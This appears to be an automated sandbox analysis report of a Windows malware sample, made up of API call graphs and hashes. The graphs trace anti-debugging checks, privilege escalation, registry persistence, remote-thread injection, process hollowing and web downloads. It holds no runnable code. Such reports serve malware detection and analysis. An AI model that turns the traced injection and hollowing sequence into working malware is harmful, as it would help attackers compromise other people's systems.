                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0B00B7CC
                                                                                                                                                                                                    • Part of subcall function 0B00E128: std::exception::_Copy_str.LIBCMT ref: 0B00E147
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0B00B7ED
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                  • String ID: leW
                                                                                                                                                                                                  • API String ID: 1924332735-1393144035
                                                                                                                                                                                                  • Opcode ID: ee070bedd9ab4b033a4ce754bf07a291d20f02d3645d9927dd998ed499958b60
                                                                                                                                                                                                  • Instruction ID: 4b063ca54a3e3f581ffddb122c066b58b96f53a1920f35b2c8d1cf54714c416f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee070bedd9ab4b033a4ce754bf07a291d20f02d3645d9927dd998ed499958b60
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6E04F72614B8A99EB24DB60F48578AB360F388384F400515E2CD17B68EFBCC209CB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3605230531-0
                                                                                                                                                                                                  • Opcode ID: da40ef7cf8e3f78734e4a07cb4c1b4b3fcef38b01a220d45c436767549023870
                                                                                                                                                                                                  • Instruction ID: a4a279447fb015f188be027c001432f6e06869724e872cdb94aa5a476665ceac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da40ef7cf8e3f78734e4a07cb4c1b4b3fcef38b01a220d45c436767549023870
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2014C79310D44D2FB089F21EC90B9423A1F788B4AF48123AC60A461A4DF38E1CAC744

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:40.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:483
                                                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                                                  execution_graph 889 7ff67352345c 950 7ff6735210a0 889->950 894 7ff67352347c 1184 7ff673524264 GetCurrentProcess OpenProcessToken 894->1184 895 7ff673523474 ExitProcess 899 7ff673523497 900 7ff6735234fb 899->900 901 7ff6735234ac 899->901 904 7ff67352354c 900->904 905 7ff673523510 900->905 902 7ff6735243a4 3 API calls 901->902 903 7ff6735234b8 902->903 906 7ff6735234bf 903->906 907 7ff6735234d2 ExitProcess 903->907 915 7ff673523561 904->915 916 7ff6735235a2 904->916 908 7ff6735243a4 3 API calls 905->908 909 7ff6735243a4 3 API calls 906->909 910 7ff67352351c 908->910 911 7ff6735234cb 909->911 912 7ff67352352b 910->912 913 7ff673523523 ExitProcess 910->913 911->907 914 7ff6735234da 911->914 917 7ff67352327c 20 API calls 912->917 1219 7ff6735232ec 914->1219 1199 7ff6735243a4 CreateMutexA 915->1199 1208 7ff673523a74 916->1208 921 7ff673523530 917->921 925 7ff673523537 Sleep 921->925 926 7ff673523544 ExitProcess 921->926 923 7ff6735234df 928 7ff6735234e6 Sleep 923->928 929 7ff6735234f3 ExitProcess 923->929 925->921 928->923 930 7ff67352357c 1203 7ff67352327c 930->1203 931 7ff673523574 ExitProcess 934 7ff673523581 937 7ff673523588 Sleep 934->937 938 7ff673523595 ExitProcess 934->938 935 7ff6735235ba 939 7ff6735243a4 3 API calls 935->939 936 7ff67352360e 7 API calls 937->934 940 7ff6735235c6 939->940 941 7ff6735235cd 940->941 942 7ff6735235e0 ExitProcess 940->942 943 7ff6735243a4 3 API calls 941->943 944 7ff6735235d9 943->944 944->942 945 7ff6735235e8 944->945 946 7ff6735232ec 47 API calls 945->946 947 7ff6735235ed 946->947 948 7ff673523601 ExitProcess 947->948 949 7ff6735235f4 Sleep 947->949 949->947 1228 7ff673521000 LoadLibraryA GetProcAddress 950->1228 952 7ff67352113a 1229 7ff673521000 LoadLibraryA GetProcAddress 952->1229 954 7ff673521154 1230 7ff673521050 LoadLibraryA GetProcAddress 954->1230 956 7ff67352116e 1231 7ff673521050 LoadLibraryA GetProcAddress 956->1231 958 7ff673521188 1232 7ff673521050 LoadLibraryA GetProcAddress 958->1232 960 7ff6735211a2 1233 7ff673521050 LoadLibraryA GetProcAddress 960->1233 962 7ff6735211bc 1234 7ff673521050 LoadLibraryA GetProcAddress 962->1234 964 7ff6735211d6 1235 7ff673521050 LoadLibraryA GetProcAddress 964->1235 966 7ff6735211f0 1236 7ff673521050 LoadLibraryA GetProcAddress 966->1236 968 7ff67352120a 1237 7ff673521050 LoadLibraryA GetProcAddress 968->1237 970 7ff673521224 1238 7ff673521050 LoadLibraryA GetProcAddress 970->1238 972 7ff67352123e 1239 7ff673521000 LoadLibraryA GetProcAddress 972->1239 974 7ff673521258 1240 7ff673521000 LoadLibraryA GetProcAddress 974->1240 976 7ff673521272 1241 7ff673521000 LoadLibraryA GetProcAddress 976->1241 978 7ff67352128c 1242 7ff673521000 LoadLibraryA GetProcAddress 978->1242 980 7ff6735212a6 1243 7ff673521050 LoadLibraryA GetProcAddress 980->1243 982 7ff6735212c0 1244 7ff673521050 LoadLibraryA GetProcAddress 982->1244 984 7ff6735212da 1245 7ff673521050 LoadLibraryA GetProcAddress 984->1245 986 7ff6735212f4 1246 7ff673521050 LoadLibraryA GetProcAddress 986->1246 988 7ff67352130e 1247 7ff673521050 LoadLibraryA GetProcAddress 988->1247 990 7ff673521328 1248 7ff673521050 LoadLibraryA GetProcAddress 990->1248 992 7ff673521342 1249 7ff673521050 LoadLibraryA GetProcAddress 992->1249 994 7ff67352135c 1250 7ff673521050 LoadLibraryA GetProcAddress 994->1250 996 7ff673521376 1251 7ff673521050 LoadLibraryA GetProcAddress 996->1251 998 7ff673521390 1252 7ff673521050 LoadLibraryA GetProcAddress 998->1252 1000 7ff6735213aa 1253 7ff673521050 LoadLibraryA GetProcAddress 1000->1253 1002 7ff6735213c4 1254 7ff673521050 LoadLibraryA GetProcAddress 1002->1254 1004 7ff6735213de 1255 7ff673521050 LoadLibraryA GetProcAddress 1004->1255 1006 7ff6735213f8 1256 7ff673521050 LoadLibraryA GetProcAddress 1006->1256 1008 7ff673521412 1257 7ff673521050 LoadLibraryA GetProcAddress 1008->1257 1010 7ff67352142c 1258 7ff673521050 LoadLibraryA GetProcAddress 1010->1258 1012 7ff673521446 1259 7ff673521050 LoadLibraryA GetProcAddress 1012->1259 1014 7ff673521460 1260 7ff673521050 LoadLibraryA GetProcAddress 1014->1260 1016 7ff67352147a 1261 7ff673521050 LoadLibraryA GetProcAddress 1016->1261 1018 7ff673521494 1262 7ff673521050 LoadLibraryA GetProcAddress 1018->1262 1020 7ff6735214ae 1263 7ff673521050 LoadLibraryA GetProcAddress 1020->1263 1022 7ff6735214c8 1264 7ff673521050 LoadLibraryA GetProcAddress 1022->1264 1024 7ff6735214e2 1265 7ff673521050 LoadLibraryA GetProcAddress 1024->1265 1026 7ff6735214fc 1266 7ff673521050 LoadLibraryA GetProcAddress 1026->1266 1028 7ff673521516 1267 7ff673521050 LoadLibraryA GetProcAddress 1028->1267 1030 7ff673521530 1268 7ff673521050 LoadLibraryA GetProcAddress 1030->1268 1032 7ff67352154a 1269 7ff673521050 LoadLibraryA GetProcAddress 1032->1269 1034 7ff673521564 1270 7ff673521050 LoadLibraryA GetProcAddress 1034->1270 1036 7ff67352157e 1271 7ff673521050 LoadLibraryA GetProcAddress 1036->1271 1038 7ff673521598 1272 7ff673521050 LoadLibraryA GetProcAddress 1038->1272 1040 7ff6735215b2 1273 7ff673521050 LoadLibraryA GetProcAddress 1040->1273 1042 7ff6735215cc 1274 7ff673521050 LoadLibraryA GetProcAddress 1042->1274 1044 7ff6735215e6 1275 7ff673521050 LoadLibraryA GetProcAddress 1044->1275 1046 7ff673521600 1276 7ff673521050 LoadLibraryA GetProcAddress 1046->1276 1048 7ff67352161a 1277 7ff673521050 LoadLibraryA GetProcAddress 1048->1277 1050 7ff673521634 1278 7ff673521050 LoadLibraryA GetProcAddress 1050->1278 1052 7ff67352164e 1279 7ff673521050 LoadLibraryA GetProcAddress 1052->1279 1054 7ff673521668 1280 7ff673521050 LoadLibraryA GetProcAddress 1054->1280 1056 7ff673521682 1281 7ff673521050 LoadLibraryA GetProcAddress 1056->1281 1058 7ff67352169c 1282 7ff673521050 LoadLibraryA GetProcAddress 1058->1282 1060 7ff6735216b6 1283 7ff673521050 LoadLibraryA GetProcAddress 1060->1283 1062 7ff6735216d0 1284 7ff673521050 LoadLibraryA GetProcAddress 1062->1284 1064 7ff6735216ea 1285 7ff673521050 LoadLibraryA GetProcAddress 1064->1285 1066 7ff673521704 1286 7ff673521050 LoadLibraryA GetProcAddress 1066->1286 1068 7ff67352171e 1287 7ff673521050 LoadLibraryA GetProcAddress 1068->1287 1070 7ff673521738 1288 7ff673521050 LoadLibraryA GetProcAddress 1070->1288 1072 7ff673521752 1289 7ff673521050 LoadLibraryA GetProcAddress 1072->1289 1074 7ff67352176c 1290 7ff673521050 LoadLibraryA GetProcAddress 1074->1290 1076 7ff673521786 1291 7ff673521050 LoadLibraryA GetProcAddress 1076->1291 1078 7ff6735217a0 1292 7ff673521050 LoadLibraryA GetProcAddress 1078->1292 1080 7ff6735217ba 1293 7ff673521050 LoadLibraryA GetProcAddress 1080->1293 1082 7ff6735217d4 1294 7ff673521050 LoadLibraryA GetProcAddress 1082->1294 1084 7ff6735217ee 1295 7ff673521050 LoadLibraryA GetProcAddress 1084->1295 1086 7ff673521808 1296 7ff673521050 LoadLibraryA GetProcAddress 1086->1296 1088 7ff673521822 1297 7ff673521050 LoadLibraryA GetProcAddress 1088->1297 1090 7ff67352183c 1298 7ff673521050 LoadLibraryA GetProcAddress 1090->1298 1092 7ff673521856 1299 7ff673521050 LoadLibraryA GetProcAddress 1092->1299 1094 7ff673521870 1300 7ff673521050 LoadLibraryA GetProcAddress 1094->1300 1096 7ff67352188a 1301 7ff673521050 LoadLibraryA GetProcAddress 1096->1301 1098 7ff6735218a4 1302 7ff673521050 LoadLibraryA GetProcAddress 1098->1302 1100 7ff6735218be 1303 7ff673521050 LoadLibraryA GetProcAddress 1100->1303 1102 7ff6735218d8 1304 7ff673521050 LoadLibraryA GetProcAddress 1102->1304 1104 7ff6735218f2 1305 7ff673521050 LoadLibraryA GetProcAddress 1104->1305 1106 7ff67352190c 1306 7ff673521050 LoadLibraryA GetProcAddress 1106->1306 1108 7ff673521926 1307 7ff673521050 LoadLibraryA GetProcAddress 1108->1307 1110 7ff673521940 1308 7ff673521050 LoadLibraryA GetProcAddress 1110->1308 1112 7ff67352195a 1309 7ff673521050 LoadLibraryA GetProcAddress 1112->1309 1114 7ff673521974 1310 7ff673521050 LoadLibraryA GetProcAddress 1114->1310 1116 7ff67352198e 1311 7ff673521050 LoadLibraryA GetProcAddress 1116->1311 1118 7ff6735219a8 1312 7ff673521050 LoadLibraryA GetProcAddress 1118->1312 1120 7ff6735219c2 1313 7ff673521050 LoadLibraryA GetProcAddress 1120->1313 1122 7ff6735219dc 1314 7ff673521050 LoadLibraryA GetProcAddress 1122->1314 1124 7ff6735219f6 1315 7ff673521050 LoadLibraryA GetProcAddress 1124->1315 1126 7ff673521a10 1316 7ff673521050 LoadLibraryA GetProcAddress 1126->1316 1128 7ff673521a2a 1317 7ff673521050 LoadLibraryA GetProcAddress 1128->1317 1130 7ff673521a44 1318 7ff673521050 LoadLibraryA GetProcAddress 1130->1318 1132 7ff673521a5e 1319 7ff673521050 LoadLibraryA GetProcAddress 1132->1319 1134 7ff673521a78 1320 7ff673521050 LoadLibraryA GetProcAddress 1134->1320 1136 7ff673521a92 1321 7ff673521050 LoadLibraryA GetProcAddress 1136->1321 1138 7ff673521aac 1322 7ff673521050 LoadLibraryA GetProcAddress 1138->1322 1140 7ff673521ac6 1323 7ff673521050 LoadLibraryA GetProcAddress 1140->1323 1142 7ff673521ae0 1324 7ff673521050 LoadLibraryA GetProcAddress 1142->1324 1144 7ff673521afa 1325 7ff673521050 LoadLibraryA GetProcAddress 1144->1325 1146 7ff673521b14 1326 7ff673521050 LoadLibraryA GetProcAddress 1146->1326 1148 7ff673521b2e 1327 7ff673521000 LoadLibraryA GetProcAddress 1148->1327 1150 7ff673521b48 1328 7ff673521050 LoadLibraryA GetProcAddress 1150->1328 1152 7ff673521b62 1329 7ff673521050 LoadLibraryA GetProcAddress 1152->1329 1154 7ff673521b7c 1330 7ff673521050 LoadLibraryA GetProcAddress 1154->1330 1156 7ff673521b96 1331 7ff673521050 LoadLibraryA GetProcAddress 1156->1331 1158 7ff673521bb0 1332 7ff673521050 LoadLibraryA GetProcAddress 1158->1332 1160 7ff673521bca 1333 7ff673521050 LoadLibraryA GetProcAddress 1160->1333 1162 7ff673521be4 1334 7ff673521050 LoadLibraryA GetProcAddress 1162->1334 1164 7ff673521bfe 1335 7ff673521000 LoadLibraryA GetProcAddress 1164->1335 1166 7ff673521c18 1336 7ff673521000 LoadLibraryA GetProcAddress 1166->1336 1168 7ff673521c32 1337 7ff673521050 LoadLibraryA GetProcAddress 1168->1337 1170 7ff673521c4c 1338 7ff673521050 LoadLibraryA GetProcAddress 1170->1338 1172 7ff673521c66 1339 7ff673521050 LoadLibraryA GetProcAddress 1172->1339 1174 7ff673521c80 1340 7ff673521050 LoadLibraryA GetProcAddress 1174->1340 1176 7ff673521c9a 1341 7ff673521050 LoadLibraryA GetProcAddress 1176->1341 1178 7ff673521cb4 1342 7ff673521050 LoadLibraryA GetProcAddress 1178->1342 1180 7ff673521cce 1181 7ff67352321c IsDebuggerPresent 1180->1181 1182 7ff67352322e GetCurrentProcess CheckRemoteDebuggerPresent 1181->1182 1183 7ff67352322a 1181->1183 1182->1183 1183->894 1183->895 1185 7ff67352428a GetTokenInformation 1184->1185 1186 7ff673523481 1184->1186 1343 7ff673523b54 VirtualAlloc 1185->1343 1195 7ff673523ce4 GetModuleFileNameW 1186->1195 1188 7ff6735242bb GetTokenInformation 1189 7ff6735242e8 CloseHandle 1188->1189 1190 7ff673524302 AdjustTokenPrivileges CloseHandle 1188->1190 1191 7ff673523b24 VirtualFree 1189->1191 1344 7ff673523b24 1190->1344 1193 7ff6735242fd 1191->1193 1193->1186 1196 7ff673523d0f PathFindFileNameW wcslen 1195->1196 1197 7ff673523dd2 wcsncpy 1195->1197 1198 7ff673523d49 1196->1198 1197->1198 1198->899 1200 7ff67352356d 1199->1200 1201 7ff6735243d0 GetLastError 1199->1201 1200->930 1200->931 1201->1200 1202 7ff6735243dd CloseHandle 1201->1202 1202->1200 1347 7ff6735238c4 1203->1347 1205 7ff67352328c 1350 7ff6735244b4 CreateFileW 1205->1350 1209 7ff673523744 3 API calls 1208->1209 1210 7ff673523a9f 1209->1210 1211 7ff6735238c4 11 API calls 1210->1211 1212 7ff673523aa9 GetModuleFileNameW DeleteFileW CopyFileW 1211->1212 1213 7ff6735235a7 1212->1213 1214 7ff673523aeb SetFileAttributesW 1212->1214 1217 7ff6735233ec GetVersionExW 1213->1217 1367 7ff6735239b4 RegOpenKeyExW 1214->1367 1218 7ff67352341d 1217->1218 1218->935 1218->936 1220 7ff6735238c4 11 API calls 1219->1220 1221 7ff6735232fd 1220->1221 1370 7ff6735246e4 CreateFileW 1221->1370 1223 7ff673523357 CreateThread 1223->923 1224 7ff673523315 1224->1223 1382 7ff6735240c4 1224->1382 1228->952 1229->954 1230->956 1231->958 1232->960 1233->962 1234->964 1235->966 1236->968 1237->970 1238->972 1239->974 1240->976 1241->978 1242->980 1243->982 1244->984 1245->986 1246->988 1247->990 1248->992 1249->994 1250->996 1251->998 1252->1000 1253->1002 1254->1004 1255->1006 1256->1008 1257->1010 1258->1012 1259->1014 1260->1016 1261->1018 1262->1020 1263->1022 1264->1024 1265->1026 1266->1028 1267->1030 1268->1032 1269->1034 1270->1036 1271->1038 1272->1040 1273->1042 1274->1044 1275->1046 1276->1048 1277->1050 1278->1052 1279->1054 1280->1056 1281->1058 1282->1060 1283->1062 1284->1064 1285->1066 1286->1068 1287->1070 1288->1072 1289->1074 1290->1076 1291->1078 1292->1080 1293->1082 1294->1084 1295->1086 1296->1088 1297->1090 1298->1092 1299->1094 1300->1096 1301->1098 1302->1100 1303->1102 1304->1104 1305->1106 1306->1108 1307->1110 1308->1112 1309->1114 1310->1116 1311->1118 1312->1120 1313->1122 1314->1124 1315->1126 1316->1128 1317->1130 1318->1132 1319->1134 1320->1136 1321->1138 1322->1140 1323->1142 1324->1144 1325->1146 1326->1148 1327->1150 1328->1152 1329->1154 1330->1156 1331->1158 1332->1160 1333->1162 1334->1164 1335->1166 1336->1168 1337->1170 1338->1172 1339->1174 1340->1176 1341->1178 1342->1180 1343->1188 1345 7ff673523b48 1344->1345 1346 7ff673523b35 VirtualFree 1344->1346 1345->1186 1346->1345 1356 7ff673523744 GetWindowsDirectoryW 1347->1356 1349 7ff6735238f3 8 API calls 1349->1205 1351 7ff67352452b GetLastError 1350->1351 1352 7ff67352450a 1350->1352 1353 7ff67352329f CreateThread Sleep 1351->1353 1361 7ff673524404 GetFileSize 1352->1361 1353->934 1357 7ff673523798 GetVolumeInformationW 1356->1357 1358 7ff67352378e 1356->1358 1359 7ff673523814 1357->1359 1358->1357 1360 7ff67352387e wsprintfW 1359->1360 1360->1349 1366 7ff673523b54 VirtualAlloc 1361->1366 1363 7ff673524430 1364 7ff67352447a CloseHandle 1363->1364 1365 7ff673524444 SetFilePointer ReadFile 1363->1365 1364->1353 1365->1364 1366->1363 1368 7ff6735239f9 RegSetValueExW RegCloseKey 1367->1368 1369 7ff6735239f5 1367->1369 1368->1369 1369->1213 1371 7ff67352473e 1370->1371 1372 7ff673524745 GetFileSize GetProcessHeap RtlAllocateHeap 1370->1372 1371->1224 1373 7ff67352478e CloseHandle 1372->1373 1374 7ff6735247a0 ReadFile 1372->1374 1373->1371 1375 7ff6735247c7 GetProcessHeap HeapFree CloseHandle 1374->1375 1376 7ff6735247ef 1374->1376 1375->1371 1377 7ff673524808 GetProcessHeap HeapFree CloseHandle 1376->1377 1379 7ff673524830 1376->1379 1377->1371 1378 7ff67352499b GetProcessHeap HeapFree CloseHandle 1378->1371 1379->1378 1380 7ff6735248eb GetProcessHeap RtlAllocateHeap 1379->1380 1381 7ff673524934 1380->1381 1381->1378 1397 7ff673524004 CreateToolhelp32Snapshot 1382->1397 1385 7ff6735240e4 1386 7ff67352414b GetCurrentProcess OpenProcessToken 1385->1386 1387 7ff673524168 LookupPrivilegeValueW 1386->1387 1388 7ff6735241c2 OpenProcess 1386->1388 1389 7ff6735241b7 CloseHandle 1387->1389 1390 7ff673524190 AdjustTokenPrivileges 1387->1390 1391 7ff6735241e4 1388->1391 1393 7ff6735241ee 1388->1393 1389->1388 1390->1389 1394 7ff67352424f 1391->1394 1395 7ff673524244 CloseHandle 1391->1395 1393->1391 1396 7ff673524222 WaitForSingleObject 1393->1396 1404 7ff673522cb8 1393->1404 1394->1223 1395->1394 1396->1386 1396->1391 1398 7ff673523342 1397->1398 1399 7ff67352403f Process32FirstW 1397->1399 1398->1385 1400 7ff673524099 CloseHandle 1399->1400 1401 7ff67352405e wcscmp 1399->1401 1400->1398 1402 7ff673524082 Process32NextW 1401->1402 1403 7ff673524075 1401->1403 1402->1400 1402->1401 1403->1400 1406 7ff673522d0b 1404->1406 1405 7ff673522d2b 1405->1393 1406->1405 1408 7ff673522d4d VirtualAllocEx 1406->1408 1412 7ff673522a88 1406->1412 1408->1405 1409 7ff673522d87 WriteProcessMemory 1408->1409 1409->1405 1410 7ff673522dd0 VirtualProtectEx 1409->1410 1410->1405 1411 7ff673522e03 CreateRemoteThread 1410->1411 1411->1405 1411->1406 1414 7ff673522b01 1412->1414 1413 7ff673522b08 1413->1406 1414->1413 1415 7ff673522c0a StrStrA 1414->1415 1415->1413 1415->1414 1419 7ff673522f9c 1420 7ff6735238c4 11 API calls 1419->1420 1421 7ff673522fdb 1420->1421 1422 7ff6735246e4 17 API calls 1421->1422 1423 7ff673522fff 1422->1423 1424 7ff6735240c4 5 API calls 1423->1424 1425 7ff673523022 1424->1425 1426 7ff6735240e4 13 API calls 1425->1426 1427 7ff673523037 GetProcessHeap HeapFree 1426->1427 1434 7ff673521cdc 1435 7ff673521d06 InternetOpenW 1434->1435 1436 7ff673521d40 InternetOpenUrlW 1435->1436 1437 7ff673521d33 Sleep 1435->1437 1438 7ff673521d77 InternetOpenUrlW 1436->1438 1439 7ff673521dc9 HttpQueryInfoA 1436->1439 1437->1435 1438->1439 1440 7ff673521dae InternetCloseHandle Sleep 1438->1440 1441 7ff673521df8 InternetCloseHandle InternetCloseHandle Sleep 1439->1441 1442 7ff673521e1e 1439->1442 1440->1435 1441->1435 1443 7ff673521e28 InternetCloseHandle InternetOpenUrlW 1442->1443 1444 7ff673521e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1442->1444 1443->1444 1445 7ff673521e6a InternetCloseHandle Sleep 1443->1445 1446 7ff673521eea InternetCloseHandle InternetCloseHandle 1444->1446 1447 7ff673521f04 1444->1447 1445->1435 1448 7ff673521f83 1446->1448 1449 7ff673521f0c InternetReadFile 1447->1449 1450 7ff673521f5a InternetCloseHandle InternetCloseHandle 1447->1450 1449->1447 1449->1450 1450->1448 1451 7ff6735230dc 1456 7ff6735230e5 1451->1456 1452 7ff6735231d1 1455 7ff673523c24 RegDeleteKeyW 1455->1456 1456->1452 1456->1455 1457 7ff673523e24 9 API calls 1456->1457 1458 7ff6735239b4 3 API calls 1456->1458 1460 7ff6735245c4 CreateFileW 1456->1460 1465 7ff673523b84 RegOpenKeyExW 1456->1465 1457->1456 1459 7ff6735231c1 Sleep 1458->1459 1459->1456 1461 7ff67352465a 1460->1461 1462 7ff67352461f 1460->1462 1461->1456 1468 7ff673524544 SetFilePointer WriteFile SetEndOfFile 1462->1468 1464 7ff67352463b SetFileAttributesW CloseHandle 1464->1461 1466 7ff673523bd8 RegSetValueExW RegCloseKey 1465->1466 1467 7ff673523c12 1465->1467 1466->1467 1467->1456 1468->1464 837 7ff6735233ac 840 7ff673522048 GetModuleFileNameW 837->840 841 7ff6735220c9 840->841 849 7ff6735220c4 840->849 842 7ff673522107 841->842 843 7ff67352211d 841->843 844 7ff67352213b 842->844 845 7ff673522111 842->845 883 7ff673521f88 ExpandEnvironmentStringsW 843->883 884 7ff673521fc8 ExpandEnvironmentStringsW 844->884 845->849 885 7ff673522008 ExpandEnvironmentStringsW 845->885 850 7ff673522132 850->849 851 7ff67352218d CreateProcessW 850->851 851->849 852 7ff6735221e8 CreateFileW 851->852 852->849 853 7ff67352222f GetFileSize 852->853 854 7ff673522257 CloseHandle 853->854 855 7ff67352224d 853->855 854->849 855->854 856 7ff673522267 VirtualAlloc 855->856 857 7ff6735222a1 ReadFile 856->857 858 7ff673522291 CloseHandle 856->858 859 7ff6735222ce VirtualFree CloseHandle 857->859 860 7ff6735222f1 CloseHandle GetThreadContext 857->860 858->849 859->849 861 7ff673522359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 860->861 862 7ff673522341 VirtualFree 860->862 863 7ff6735223f8 VirtualAllocEx 861->863 864 7ff6735223e0 VirtualFree 861->864 862->849 865 7ff67352247b WriteProcessMemory 863->865 866 7ff673522463 VirtualFree 863->866 864->849 867 7ff6735224b1 VirtualFree 865->867 870 7ff6735224c9 865->870 866->849 867->849 868 7ff6735224ff WriteProcessMemory 869 7ff67352258a VirtualFree 868->869 868->870 869->849 870->868 873 7ff6735225a7 870->873 871 7ff673522619 RtlCompareMemory 871->873 879 7ff67352266c 871->879 872 7ff673522898 WriteProcessMemory SetThreadContext 874 7ff67352291e VirtualFree 872->874 875 7ff673522933 ResumeThread 872->875 873->871 873->872 874->849 876 7ff67352295a VirtualFree 875->876 877 7ff673522945 VirtualFree 875->877 876->849 877->849 878 7ff673522893 878->872 879->878 880 7ff67352279c ReadProcessMemory WriteProcessMemory 879->880 881 7ff673522889 880->881 882 7ff673522871 VirtualFree 880->882 881->879 882->849 883->850 884->850 885->850 886 7ff67352338c 887 7ff673522048 37 API calls 886->887 888 7ff67352339c 887->888 1428 7ff673522f0c CreateMutexA 1429 7ff673522f4e GetLastError 1428->1429 1430 7ff673522f31 ReleaseMutex CloseHandle 1428->1430 1432 7ff673522f78 ReleaseMutex CloseHandle 1429->1432 1433 7ff673522f5b ReleaseMutex CloseHandle 1429->1433 1431 7ff673522f90 1430->1431 1432->1431 1433->1431 1469 7ff6735231ec 1470 7ff6735231f5 1469->1470 1471 7ff67352320e 1470->1471 1474 7ff67352306c 1470->1474 1479 7ff673522e6c CreateMutexA 1474->1479 1477 7ff673523087 Sleep CreateThread WaitForSingleObject 1478 7ff6735230cc Sleep 1477->1478 1478->1470 1480 7ff673522e98 ReleaseMutex CloseHandle 1479->1480 1481 7ff673522eb5 GetLastError 1479->1481 1484 7ff673522ef7 1480->1484 1482 7ff673522edf ReleaseMutex CloseHandle 1481->1482 1483 7ff673522ec2 ReleaseMutex CloseHandle 1481->1483 1482->1484 1483->1484 1484->1477 1484->1478

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_00007FF67352E999 1 Function_00007FF67352E997 2 Function_00007FF67352359D 3 Function_00007FF673522F9C 32 Function_00007FF673523C64 3->32 86 Function_00007FF6735246E4 3->86 88 Function_00007FF6735240E4 3->88 103 Function_00007FF6735238C4 3->103 104 Function_00007FF6735240C4 3->104 4 Function_00007FF67352E99B 5 Function_00007FF6735210A0 49 Function_00007FF673521050 5->49 67 Function_00007FF673521000 5->67 6 Function_00007FF6735243A4 7 Function_00007FF67352BEAD 8 Function_00007FF6735233AC 47 Function_00007FF673522048 8->47 9 Function_00007FF6735239B4 10 Function_00007FF6735244B4 70 Function_00007FF673524404 10->70 11 Function_00007FF67352A778 12 Function_00007FF67352A776 13 Function_00007FF673522978 14 Function_00007FF67352327C 14->10 14->103 15 Function_00007FF67352A27F 16 Function_00007FF673523B84 17 Function_00007FF673521F88 18 Function_00007FF673522A88 18->13 19 Function_00007FF67352A18A 20 Function_00007FF67352338C 20->47 21 Function_00007FF67352A258 22 Function_00007FF67352EC58 23 Function_00007FF67352DE59 24 Function_00007FF67352C65C 25 Function_00007FF67352A05A 26 Function_00007FF67352345C 26->5 26->6 26->14 33 Function_00007FF673524264 26->33 39 Function_00007FF673523A74 26->39 56 Function_00007FF67352321C 26->56 79 Function_00007FF673523F14 26->79 87 Function_00007FF673523CE4 26->87 89 Function_00007FF6735233EC 26->89 90 Function_00007FF6735232EC 26->90 27 Function_00007FF67352A061 28 Function_00007FF67352D361 29 Function_00007FF67352B15F 30 Function_00007FF67352CF65 31 Function_00007FF67352D365 53 Function_00007FF673523B54 33->53 57 Function_00007FF673523B24 33->57 34 Function_00007FF67352F26A 35 Function_00007FF67352306C 36 Function_00007FF673522E6C 35->36 37 Function_00007FF67352DE70 38 Function_00007FF67352A772 39->9 44 Function_00007FF673523744 39->44 39->103 40 Function_00007FF673524674 41 Function_00007FF67352C673 42 Function_00007FF67352D339 43 Function_00007FF67352D33F 80 Function_00007FF673523714 44->80 45 Function_00007FF673524544 46 Function_00007FF67352DC46 47->17 74 Function_00007FF673522008 47->74 106 Function_00007FF673521FC8 47->106 48 Function_00007FF67352A04E 50 Function_00007FF67352CD54 51 Function_00007FF67352DC55 52 Function_00007FF67352A052 54 Function_00007FF67352D91D 55 Function_00007FF67352C91A 58 Function_00007FF673523C24 59 Function_00007FF673523E24 60 Function_00007FF67352ABF9 61 Function_00007FF67352C2F9 62 Function_00007FF67352ABF7 63 Function_00007FF67352C2F7 64 Function_00007FF6735236FC 65 Function_00007FF67352ABFB 66 Function_00007FF67352C501 68 Function_00007FF67352D904 69 Function_00007FF673524004 70->53 71 Function_00007FF67352B508 72 Function_00007FF67352E008 73 Function_00007FF673523609 75 Function_00007FF673522F0C 76 Function_00007FF67352D615 77 Function_00007FF67352D915 78 Function_00007FF67352EC12 81 Function_00007FF6735236D8 82 Function_00007FF67352A0DD 83 Function_00007FF67352B3DA 84 Function_00007FF673521CDC 85 Function_00007FF6735230DC 85->9 85->16 85->58 85->59 105 Function_00007FF6735245C4 85->105 86->40 99 Function_00007FF673522CB8 88->99 90->32 90->86 90->88 90->103 90->104 91 Function_00007FF6735231EC 91->35 92 Function_00007FF6735236EC 93 Function_00007FF67352BCF1 94 Function_00007FF67352B2F4 95 Function_00007FF67352C2F5 96 Function_00007FF67352ABF2 97 Function_00007FF67352E8F3 98 Function_00007FF67352D8B8 99->18 100 Function_00007FF67352DEC1 101 Function_00007FF67352D0C4 102 Function_00007FF67352DCC2 103->44 104->69 105->45 107 